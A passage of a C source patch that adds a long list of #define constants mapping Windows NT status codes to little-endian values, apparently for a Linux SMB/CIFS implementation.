++#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
++#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
++#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
++#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
++#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
++#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
++#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
++#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
++#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
++#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
++#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
++#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
++#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
++#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
++#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
++#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
++#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
++#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
++#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
++#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
++#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
++#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
++#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
++#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
++#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
++#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
++#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
++#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
++#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
++#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
++#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
++#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
++#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
++#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
++#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
++#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
++#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
++#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
++#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
++#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
++#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
++#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED	\
++	cpu_to_le32(0x801B00EB)
++#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
++#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
++#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
++#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
++#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
++#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
++#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
++#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
++#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
++#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
++#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
++#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
++#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
++#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
++#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
++#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
++#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
++#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
++#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
++#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
++#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
++#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
++#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
++#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
++#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
++#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
++#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
++#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
++#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
++#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
++#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
++#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
++#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
++#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
++#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
++#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
++#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
++#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
++#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
++#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
++#define STATUS_UNWIND cpu_to_le32(0xC0000027)
++#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
++#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
++#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
++#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
++#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
++#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
++#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
++#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
++#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
++#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
++#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
++#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
++#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
++#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
++#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
++#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
++#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
++#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
++#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
++#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
++#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
++#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
++#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
++#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
++#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
++#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
++#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
++#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
++#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
++#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
++#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
++#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
++#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
++#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
++#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
++#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
++#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
++#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
++#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
++#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
++#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
++#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
++#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
++#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
++#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
++#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
++#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
++#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
++#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
++#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
++#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
++#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
++#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
++#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
++#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
++#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
++#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
++#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
++#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
++#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
++#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
++#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
++#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
++#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
++#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
++#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
++#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
++#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
++#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
++#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
++#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
++#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
++#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
++#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
++#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
++#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
++#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
++#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
++#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
++#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
++#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
++#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
++#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
++#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
++#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
++#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
++#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
++#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
++#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
++#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
++#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
++#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
++#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
++#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
++#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
++#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
++#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
++#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
++#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
++#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
++#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
++#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
++#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
++#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
++#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
++#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
++#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
++#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
++#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
++#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
++#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
++#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
++#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
++#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
++#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
++#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
++#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
++#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
++#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
++#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
++#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
++#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
++#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
++#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
++#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
++#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
++#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
++#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
++#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
++#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
++#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
++#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
++#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
++#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
++#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
++#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
++#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
++#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
++#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
++#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
++#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
++#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
++#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
++#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
++#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
++#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
++#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
++#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
++#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
++#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
++#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
++#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
++#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
++#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
++#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
++#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
++#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
++#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
++#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
++#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
++#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
++#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
++#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
++#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
++#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
++#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
++#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
++#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
++#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
++#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
++#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
++#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
++#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
++#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
++#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
++#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
++#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
++#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
++#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
++#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
++#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
++#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
++#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
++#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
++#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
++#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
++#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
++#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
++#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
++#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
++#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
++#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
++#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
++#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
++#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
++#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
++#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
++#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
++#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
++#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
++#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
++#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
++#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
++#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
++#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
++#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
++#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
++#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
++#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
++#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
++#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
++#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
++#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
++#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
++#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
++#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
++#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
++#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
++#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
++#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
++#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
++#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
++#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
++#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
++#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
++#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
++#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
++#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
++#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
++#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
++#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
++#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
++#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
++#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
++#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
++#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
++#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
++#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
++#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
++#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
++#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
++#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
++#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
++#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
++#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
++#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
++#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
++#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
++#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
++#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
++#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
++#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
++#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
++#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
++#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
++#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
++#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
++#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
++#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
++#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
++#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
++#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
++#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
++#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
++#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
++#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
++#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
++#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
++#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
++#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
++#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
++#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
++#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
++#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
++#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
++#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
++#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
++#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
++#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
++#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
++#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
++#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
++#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
++#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
++#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
++#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
++#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
++#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
++#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
++#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
++#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
++#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
++#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
++#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
